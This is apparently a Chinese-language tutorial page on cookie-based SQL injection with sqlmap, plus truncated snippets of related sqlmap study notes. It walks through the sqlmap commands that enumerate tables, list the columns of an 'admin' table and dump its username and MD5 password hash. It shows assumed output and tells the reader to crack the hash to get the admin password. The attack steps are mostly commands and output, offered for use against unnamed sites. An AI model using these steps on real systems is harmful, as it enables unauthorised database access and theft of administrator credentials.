cookie注入:
1.假設這個**""存在注入點.
2.sqlmap命令提示符下輸入下列內容進行跑錶。
sqlmap -u "" --cookie "
id=9
" --table --level 2
假設返回內容如下,說明是access資料庫。
-------------------------
[info
] resuming back-
end dbms '
microsoft access'--
-----------------------
設定執行緒數:10
假設返回結果:
-------------------------------------------
[4 tables]+
----------------------+
admin
mark
province
vote+--
--------------------+
找到四個表分別為:admin mark province vote
3.猜表的欄位名:
sqlmap -u "" --cookie "
id=9
" --columns -t admin --level 2
假設找到admin表的字段如下:
id username password
---------------------------------
[info
]retrieved: id [
info
]retrieved: username [
info
]retrieved: password
----------------------------------
4.猜測欄位的內容:
sqlmap -u "" --cookie "
id=9
" --dump -t admin -c "
username,password
" --level 2
獲取結果:
[info
] retrieved: 1
[info
]retrieved: admin [
info
] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位md5加密密文)
賬號:admin 密碼:將密文解密即可。
sqlmap學習筆記
環境 centos7 python2.7.5 sqlmap1.1.8.2 dev sqlmap檔案目錄 執行命名格式 python sqlmap.py h 常用命令 通過幫助資訊可以,找到需要的命令 h 顯示基本幫助資訊 hh 顯示高階幫助資訊 u url,url url 目標url cookie ...
SQLMAP學習筆記(二)
常用引數 u 注入點 f 指紋判別資料庫型別 b 獲取資料庫版本資訊 p 指定可測試的引數 page 1 id 2 p page,id d 指定資料庫名 t 指定表名 c 指定字段 s 儲存注入過程到乙個檔案,還可中斷,下次恢復在注入 儲存 s xx.log 恢復 s xx.log resume c...
Sqlmap學習筆記(三)
sqlmap效能優化設定 sqlmap設定持久http連線,sqlmap預設是一次連線成功後馬上關閉。http報文中相當於connection close 一次連線馬上關閉 要掃瞄站點的url比較多時,這樣比較耗費效能,所以需要將http連線持久化來提高掃瞄效能。http報文相當於connectio...